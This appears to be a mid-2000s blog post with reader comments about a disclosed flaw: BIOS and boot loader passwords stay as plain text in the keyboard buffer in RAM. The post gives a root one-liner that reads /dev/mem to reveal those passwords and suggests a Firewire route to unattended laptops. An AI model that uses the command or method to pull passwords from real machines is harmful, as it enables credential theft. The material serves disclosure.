How to dump your BIOS/LILO/root password as plain text [Update]

This is old news by now, but still interesting IMHO. Jonathan Brossard has posted an article on BugTraq which gives a pretty good introduction to the inner workings of the BIOS (with lots of links to more detailed resources) as well as known vulnerabilities of the BIOS password mechanism.

The most interesting part is when he explains that the BIOS doesn't seem to erase its own keyboard buffer before it hands over control to the operating system. Also, current OSes (Linux, Windows, *BSD, etc.) don't seem to clear that buffer either.

This may not sound dangerous, but it actually allows anyone who can read the contents of your RAM, starting from address 0x041e, to view the keyboard buffer contents. And this buffer contains the BIOS password you type in when booting your machine (if you set/use a BIOS password, of course).

This one-liner (executed as root) should let you view your password as plain text:

dd if=/dev/mem bs=512 skip=2 count=1 | hexdump -C | head

(Only every second character belongs to the password, the rest are key scan codes, I think).

I also noticed that this same buffer also contains your LILO password, too! The same is probably true for passwords of other boot loaders such as GRUB, but I didn't test that.

Yes, reading this part of the RAM usually requires root privileges in Unix-like OSes, but as the security problem is OS-independant other OSes (e.g. DOS, or older Windows versions) might be directly affected.

But even on more secure OSes this plain-text storage of the BIOS/boot loader passwords might be a problem. Combine this with some Firewire insecurities and attackers with physical access to your machine (e.g. your unattended laptop, while you are on the toilet) might be able to read your BIOS/LILO passwords even though you locked your machine. I haven't yet tried this, but I'm pretty sure it's possible. Please post the results here if you try this.

(via Stefan 'Sec' Zehl)

Update 2006-01-09: It seems that when you use software suspend (swsuspend2) the RAM area can/will also contain your root password! Thanks nelson for reporting.

Comments

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.

how does data get from bios to the ram?

hi uwe! i don't really get it. i thought when the cpu starts in 16-bit real mode after you turn on the pc, it only transfers data with the rom respectively eeprom. then afterwards it switches to 32-bit protected mode and starts the os via the bootloader. then how does data gets from the bios into ram? what i did is the following:

dd if=/dev/mem of=/tmp/bla
strings bla | grep bios

and i see some parts of the bios there. is that true?

bye ian

and i see some parts of the


and i see some parts of the bios there. is that true?

Yes, (parts of) the BIOS are copied to RAM and executed from there.

Uwe.

can u give a windows

can u give a windows solution?
thank u in advance..

How Do You?

How do you Execute:
dd if=/dev/mem bs=512 skip=2 count=1 | hexdump -C | head
As Root?

Huh?

Huh? I don't think I understand you... Just type it in a terminal and hit enter?

Not on Intel boards...

Kernel: 2.4.27
Board: Intel server board

swsuspend2

hi, i try that one-liner like 3 hours after i restore from hibernate with swsuspend2 and the root password was there. so watch yours backs. sure the root password was there because i lock the tty's witch vlock and require root pasword for unlock.

can you provide another

can you provide another solution for windows users?

Use cygwin.

Use cygwin.